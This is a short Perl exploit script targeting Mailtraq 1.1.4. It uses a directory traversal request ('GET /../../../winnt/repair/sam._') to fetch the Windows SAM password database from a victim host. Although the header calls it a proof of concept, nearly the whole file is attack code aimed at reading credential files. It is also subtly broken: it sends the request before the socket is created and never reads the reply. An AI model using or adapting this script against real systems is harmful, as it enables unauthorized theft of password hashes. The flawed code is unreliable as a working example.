#!/usr/bin/perl
#
# Mailtraq-b0f.pl
# Mailtraq 1.1.4 remote exploit (root dot dot bug)
# coded by slash <tcsh@b0f.i-p.com>
#
# Based on my advisory published in February, Mailtraq is 
# vulnerable to a root dot dot bug, which allows a certain 
# user to get any file from the victims hard drive. Note that
# this was coded just as proof-of-concept.
#
# Usage: [slash@linux]# ./Mailtraq-b0f.pl <victim> 
#
# Greetz: Scrippie, HWA, eth0, sirius, Cruciphux, Mixter, #!/bin/zsh
# synnergy, orbflux, soupnazi, JimJones and a big shoutout to lamagra.


use IO::Socket;

$host = $ARGV[0];
$port = 80;
$data = "/winnt/repair/sam._";
$wait = 10;

print "Mailtraq 1.1.4 remote exploit\n";
print "coded by slash <tcsh@b0f.i-p.com>\n";
print "This was coded just as proof-of-concept\n";
print "\nFetching $data...\n";

print $socket "GET /../../..$data HTTP/1.0\n";


print "Connecting to $host...";
$socket = IO::Socket::INET->
		new(Proto=>"tcp", 
		PeerAddr=>$host, 
		PeerPort=>$port) 
		|| die "Connection failed.\n";

print "Waiting...";
$time = 0;
while ($time < $wait) {
        sleep(1);
        print ".";
        $time += 1;
}

# Finished.
close($socket);
print "\nConnection closed. Finished.\n";

# EOF
#                   www.hack.co.za   [5 September 2000]#